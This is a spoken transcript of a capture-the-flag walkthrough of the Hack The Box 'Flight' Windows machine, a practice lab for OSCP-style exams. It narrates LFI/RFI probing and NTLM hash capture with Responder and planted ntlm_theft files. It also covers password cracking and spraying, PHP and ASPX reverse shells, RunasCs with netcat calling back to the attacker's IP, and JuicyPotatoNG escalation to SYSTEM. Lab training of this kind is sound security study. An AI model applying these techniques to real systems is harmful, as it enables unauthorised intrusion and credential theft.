All right, welcome back. So today we're going to be looking at Hack the Box Flight. All right, it's one of the boxes on TJ Knowles' newest list for OSCP like boxes. I thought it was really good. We'll start off with the rust scan here. We do see it is most likely domain controller, right? We got port 88 up and running, so we got Kerberos there. And we also have port 80 and 443 up and running, which is kind of unusual on a domain controller, right? So let's go ahead and curl that port 80. And what else we'll do is we'll go ahead and we'll head over to it and see if we can see anything over here. Okay, we have this Go Aviation, our aircraft, safety, charters, contacts, everything like that, okay? Nothing really too much, but we do see this flight.htb down here at the bottom. All right, so let's go ahead and check out that flight.htb down there, and we'll throw that into our Etsy host, which I actually already have mine in there. So if I cat Etsy host, we can see that I already have flight.htb right there. So let's go ahead and we'll run um, a DNS on there, right? Look for DNS, look for different directories, things like that for a vhost. And we'll go ahead and read that like right there. And we see that we get a whole bunch of things back. Let's go ahead and do a FS 7069, right? Because that's the words, the size that we're getting a lot of. And we'll see that we'll get something back here. So we get the school back like right there. Let's go ahead and sudo nano our Etsy host. We'll go ahead and we'll throw school next to here. School.flight.hackthebox. And let's go ahead and check out that school page over there. So we head over here to school.flight.hackthebox, right? HTTP or HTTPS, whichever, either one. We get over here, we got about us, we also have a blog. And we notice in the URL up here, we have a view equals. So what we do is go ahead and copy that. And let's see if it has any type of local file inclusion. And remember, this is a Windows box. So whenever we fuff for local file inclusion, Windows box, user share, word list, we'll do sec list, fuzzing, LFI, and it's going to be Windows, LFI, Windows, right? So we want graceful security Windows, TAC U, HTTP, school. We'll store it right in there. I already copied, I believe. Yep, there we go. Let's go ahead and throw that into quotes. And instead of blog.html, we'll go ahead and we'll fuzz that part like right there. You'll see we'll start getting a lot of stuff back. So let's go ahead and do a TAC FS1102 because that's the size that we're receiving the most of, it looks like. So go ahead and we'll do that. And we do see we do have local file inclusion out here, right? So if we go ahead and we try to do this C Windows win.ini like right here, which is mostly what people look at whenever they're looking for local file inclusion for Windows. If we go ahead and we throw that in there, we do see that we do get something back here, right? Something strange, not what we're supposed to get, right? Let's go ahead and see if it has remote file inclusion. We'll try for an HTTP, and we'll go ahead and we'll throw in our IP address into it, right? Now let's go ahead and echo test into test.txt. And we'll throw that up there, /test.txt. Oh, if it decides to work. Think about 10, 10, 14, 6, 14, 21. So let's go ahead and stop that. Got a different IP address. So we'll do HTTP 10, 10, 14.21, right? And then our test.txt into there. Let's go ahead and try that. And we don't have a Python server up and running. It did give us an error. But let's go ahead and try that again with a Python server this time up and running. And we do see that we do get a 200 over here, and we get a test over here. Now, right here, I was thinking, all right, cool. Let's try to load something out of here. But you'll notice it's not actually loading right. It's not running anything. You're not able to really do much with that. So looking at other ways to be able to do this, knowing that we do have a way to be able to reach back to us, let's go ahead and do a sudo responder on ton0, and we'll try to call for a directory, right? // 10, 14, 21 / whatever, doesn't matter. But we'll see that we get suspicious activity blocked. Okay? But again, we do know that we can call back to us. So let's do our slashes the other way and try that same exact thing, / whatever. And all of a sudden, we do get back a hash over here. So that's good stuff. So let's go ahead and echo that into hash.txt. And we'll go ahead and we'll do a John hash.txt. Boom. And we'll see if we can get into this guy. Okay, so we do see that we do get a password here. Now, if you use like crack everything or anything like that, one of the things I made, you'll see that Service Apache can't really do much. He can read places, he can't write anywhere, he can't really do much, right? So let's go ahead and let's do look up SID. All right, and we're going to utilize flight.htb, right? That's our domain name. Service Apache, and then we have our password here at flight.htb because it's already in my Etsy host. And we'll let that guy run. So if I cat that SID.text, we should start receiving usernames. We do okay. Let's go ahead and cut tac D, and we'll start with, I guess, that slash like right there. Slash tac F2, right? Because obviously we want this side over here. We want the username. And we'll do that for sid.text. And we'll put that into a.text. All right, then we'll go ahead and we'll cut tac D. We'll say this guy like right here out of there, right? Tac F1, obviously, because we want this side over here now, right? So we want the first side of it. And a.text, and we'll throw that into b.text. Let's go ahead and cat that b.text, make sure we're in the right place. We are. Let's go ahead and we'll cat that b.text, and then we'll go ahead and we will grep, or we'll do a sed, right? And I always forget the command for this. So we'll say remove all white space from somewhere, right? So we'll go ahead and we'll sed. We'll throw that into there. Throw our command in. Boom. And we'll save that into users.text. If I go ahead and cat this users.text now, we see that we have all of our usernames, and there's not going to be a white space behind those. They'll throw it off. Let's go and do an NXC SMB, and we're going to use that IP address, 10.10.11.187, tac U, users.text, right? And we're going to put that password in there that we got from Apache, just to see if any other users are using that same password, and then we'll do a continue on success. And this will take a minute to run, obviously. And I also messed up because I didn't save everybody to a what is it? If I cat the SID.text right, we'll notice that we got SID type user, which I should have saved everyone to there. I should have done a grep for it and then saved that like that. So that if I would have done that right, that I cat that a.text, we only have the user in here. We would be throwing out all those groups and everything too. But we do get back a password for s.moon. So let's go ahead and do an NXC SMB 10.10.11.187 tac U s.moon, right? Our password that we have here, okay? Then tac shares there. And we'll see what shares this guy can look at and everything like that, and if he can write to anything. You would notice if you did this all the way up to this point so far, nobody can write to a share yet. All right, but we do see that this guy can read and write to a shared folder. So let's go ahead and hop in there as a B client. We're going to go into shared, right, for s.moon. Okay, let's go ahead and throw his password into here. So I keep hearing something. There we go, do a dir. All right. Actually, this hasn't been reset yet, so it's going to look a little weird. So let's go ahead and exit that, and I'm going to show you how I did that part like right there. So what I use for this, if I cd into my tools, and then NTLM theft, okay, ls-tac LA in here, we're going to go ahead and we're going to remove tac rf that test directory. And what we're going to do is we're going to do Python NTLM theft. We're going to do a tac generate all, so we're going to generate everything that this thing can. The server, which is actually my IP address, which is not it anymore, so we're actually going to have to rewrite all those. It's going to be 10.10.14.21 with a file name of test. If we hit enter here, you notice that it makes all of these different files in here, right? So if we go to cd into test now, we have all those different files in there. Now trying to put all those files on there is going to be a little bit rough. So what we're going to do is we're going to do a sudo mount tac t sifs, okay? We're going to put in 10.10.11.187/shared. That's the share that we go to. The user, tac O is for options. So we got a user option of smoon, password equals his password. We're going to put that in the mount folder. Let's go ahead and make sure that actually exists. And we're also going to do that in this tools NTLM theft down here. So we go ahead and actually grab that like right there. We actually want to do that down here, okay? And we want to go ahead and we want to put that in the mount folder because we're going to try to put all these things into there from that test, right? So let's go ahead and do this, and we'll go ahead and we'll do a make directory mount within this folder down here. We'll hit enter here. And now if I cd into mount, there we go. All right, let's go ahead and remove tac rf star. And we'll also, yes please. Oh, sudo remove tac rf star. All right, we're right back to right where we would have been started, okay? Now what we can do here is we go ahead and copy everything over in here, right? So we can copy from this NTLF, so copy tag R, tools NTLF test, and then we're just going to copy every single thing into here. Star to /star to right here, okay? It will see a bunch of permissions denied. That's just files that it's not allowed to take. If we go back into it, if we SMB client back into it, we will notice that there was files that we could take in there. If we do a ls-tag-la, or dir, excuse me, we're on Windows. All right, decided to actually do none of those because I had to put a sudo in front of it. There we go. Okay, let's go ahead and do an ls or dir again. And we are getting files up and in there, right? So let's go ahead and start responder. And we'll see if maybe another user is actually going into this folder or whatever else, if there's automated users on here, right? All right, so I had to reset the box, everything like that. But as you can see, we do get cbum back, okay? And this is the files that were put into there. All right, mount doesn't really matter. It's mostly these guys like right here. Okay, and then that's not the INI file, like right there, put in there. And we do get that cbum back, okay? So we get his file back here. Let's go ahead and get this back over to here, and we'll echo that into hash.text. Then we'll go ahead and we will do a John hash.text fork equals 4. Let me go ahead and stop that over here. We exit out of here now. Or you can always use what is it, hashcat or something like that. But we do get a password right here. So we have this. We go ahead and use crack everything or whatever else, okay? But we will see that he is at least able to now get into the machine under he can now utilize a share again. So let's go ahead and do an SMB client again. Tag L for this guy, or an NXC. We'll actually use NXC for netexec, right? And we'll do cbum, c.bum. And so far we have not been able to actually get into the box. We're still just working on these shares, right? But we'll see that he could write to a very weird share called web. So let's go ahead and let's look up let's see here, locate, we'll say shell.php, actually do star, shell.php, right? We're looking for a Windows reverse shell here. Remember, we are a Windows machine. So I have one like right here. So I'm going to go ahead and copy that over to here. And we'll go ahead and we'll move that Windows reverse shell to shell.php. I'll go ahead and do one more ifconfig, grab my IP address here. We can see that he can write to the web directory here, right? Which is quite strange. So let's go ahead and do a sublime for that shell.php. Scrolling down the bottom down here, and we'll grab this IP address, throw that in there, 445. We'll go ahead and we'll save that. Now we have that saved. Let's go to that directory there. So we'll do an SMB client. Boom, this time for web, right? With the username of cbum, that is correct. And we'll go ahead and we will grab his password again. Throw that in. And we have this flight.htb, that's school.flight.htb. Let's go ahead and cd that school.flight.htb because flight.htb was a static page. At least the other one actually has PHP in it. We'll go ahead and we will upload now, or put our shell.php in here, right? So we now put that in there. Let's go ahead and start up our listener. And let's see if we can't go to school.flight/shell.php. Now there is something on the machine that will delete this after so long. So you got to kind of move a little bit quick to get to it. But once you're in, you're in. So who am I? I have service Apache. Who am I /all? We don't really have any good privs. But remember, we do have some passwords. We have cbum's password, stuff like that. So if I do a net user, okay, we can see that cbum is on this machine, like right here. So let's go and make directory temp. We'll cd to there. We'll cd to temp. And let's grab another guy over here. We'll cd into desktop, or excuse me, tools. Start up a Python server. Grab my IP address again. I know, I'm horrible at my IP address. We'll go and do a W or a PowerShell. wget http my IP address /nc64.exe tech o nc64.exe. Right, we'll throw that on here. Then what we're also going to do is run as C's. Okay, because we know that cbum is on here. but he doesn't have any rights to do anything out here. So what we're going to do is we're just going to do an ls-la, grep for run as, and we'll grab this invoke run as C's, right? But this time we're going to use IEX IWR, put it into memory, right? Put everything that we can into memory. Basic parsing, HTTP / invoke run as C's. I'm going to exit off here. Move this guy over. There we are. Okay, so now we have netcat and invoke run as C's on the machine here. So, try to click up here. There we go. So let's go ahead and now do an invoke run as C's. Tag username is going to be cbum, right? Tag password is going to be that password that we had for up here, right? Wherever that went. There we go. Should probably put it into a password file. And then tag command is going to be / netcat64.exe. Remember, we are on PowerShell, so we have to do that / tag e command on my IP address 10.10.14.21, I believe it is, on port 445. We'll go ahead and we'll start up a listener up here on port 445, so we know that can talk to us. Go ahead and enter there, and all of a sudden we can call back, who am I? I am cbum now. Okay, cool. Now cbum, remember, he could write to the web directory. Okay, so let's go ahead and see what else he could write to. So we'll cd to c, dir. We have xamp here, which we're pretty sure was what we were looking at before. However, we also have an inetpub here, which is kind of strange. Well, actually, yeah, we have inetpub here. A little bit strange because we only saw port 80 up and running, right? That's all we saw. So before I actually lose this, go ahead and echo. Whoop, that's not where I want to go with it. We'll echo cbub, that guy, into user path.text. We'll exit out here. We'll exit out this one over here. There we go. Okay, so let's go ahead and see, is there another port up and running? That's .tech A&O. Right, we're going to get a lot of crap back. But we scroll up to the top here, and we will see that port 8000 is up and running. Right, so we do have port 8000. It is listening. So we can try curl it. Let's go ahead and hop over into PowerShell. We do a curl. Attack v, HTTP 127.0.0.1, 8000. And okay, this is the very first time. I wonder if you can use basic parsing. Let's go ahead and actually hop back over into command shell again. Something I can do a command and then curl from here also. HTTP 127.0.0.1, 8000. Let's go and try that like right there. There we go. Okay, we do see that we can curl it, right? So this page does exist, right? So let's go ahead and cd to inetpub. And we see this development. Development is not normal within inetpub, like right here. The rest of these are pretty normal. Development is not. So let's cd development. And we see this contact HTML and everything else. Now we do have to check real quick to see if www root, see if ASP is on here. And it is. So we do have an ASP.client. That's awesome for us. So that means we can put an ASP or an ASPX shell on there. And usually if we get a callback from something like something that can run in inetpub, we're going to have some privileges that we can utilize to be able to become system on the machine, utilizing juice potato, things like that, right? So let's go ahead and let's grab let's go ahead and we'll locate start.aspx. We'll try and grab ourselves a little reverse shell here. We got shell.aspx, probably this guy right here. We'll go ahead and grab him. We'll copy him over to here. All right, you can use any ASPX shell or just make one out of MSF Venom or whatever else. So we'll go to Sublime shell.aspx. This looks pretty good actually. And we'll go ahead 10.10.14.21 was my P address, right? We'll go ahead and we'll save that. And we got to put that over here now. So we can try to do a copy, or we can just start up a web server. Right, let's go ahead and stop it down here. We'll exit out of that. Go ahead and we'll start up a web server over here. Go into PowerShell. We'll do a wget HTTP. Wget tac use basic parsing, so we don't get that Internet Explorer engine hasn't been started yet. 10.10.14.21 /shell.aspx. Tac O, because we have to save it right, shell.aspx. It looks like that just saved, okay? So let's go ahead and we'll start up another RL wrap on port 445, which I'm pretty sure is the one that I did on. Whoops. Well, that's okay. We can actually look at it right here. So, yep, port 445. All right. So now let's go ahead and let's do a curl for HTTP 127.0.0.1 8000 /development /shell.aspx. Oh, that's ASPC, ASPX. It doesn't look like it wants to do it right there. But that's because Internet Explorer. Let's go ahead and go back into command prompt. We'll try that again. All right, doesn't seem to like that, like right there. Let's try it without development, maybe. And we do get a callback down here, okay? So it's obviously just going straight to that page, so we get ourselves a callback. So now, if I do a who am I / all, we do see that we are SE impersonator privileged. We do have that privilege like right there, which will allow us to be able to utilize Juicy Potato and become NT authority system. And we can also see that we are the IIS app pool, right? So we have now increased our privileges and everything like that. And we can now go into CD into tools. Now remember, we do already have that cat on here. So if I CD into my C temp directory, dir, right, we already have the NC64 on there. Now what we got to do with lstack.la, Juicy. And we can go ahead and grab that Juicy Potato NG. So we'll do a quick PowerShell, wget HTTP, use basic parsing. 10.10.14.21 / juicypotato.ng. So our new age one there, right? New generation. Let's go ahead and do a Python 3 server. We'll bring that back over to ourselves over here. There we go. Now we have that Juicy Potato. Let's go ahead and look up our Juicy Potato attack, right? So we'll hop over to Obsidian. There we go. I already actually have searched for Juicy Potato, so awesome. So we can just grab this guy right here. Thank you very much. And we'll just go ahead and change his IP address to 10.10.14.21. Let's go ahead and look at what's going on here with this Juicy Potato attack. So we'll do our RL wrap on port 445, right? We go ahead and stop this up here. This doesn't really matter anymore. All right, we also can stop that down here. That doesn't matter anymore. So what we have here is we're running Juicy Potato NG, which we just downloaded the machine, right? And the payload that we're going to run is command.exe, going to C Windows System 32. And the argument that we're going to run within that command.exe is going to ctemp nc64 tech e command.exe and just run that netcat reverse shell back to myself, right? So let's go ahead and hit enter here. And we do get a callback. If I do a who am I, we can see that I'm NT authority system, allowing me to be able to read and write to the administrator or whoever else on the system. And that is it for this machine. A lot of different steps. I thought that was a lot of fun to do it. Had a lot of different steps. And that's going to be all. So hope you all liked it. Hope you all enjoyed the video. And I'll talk to you all later.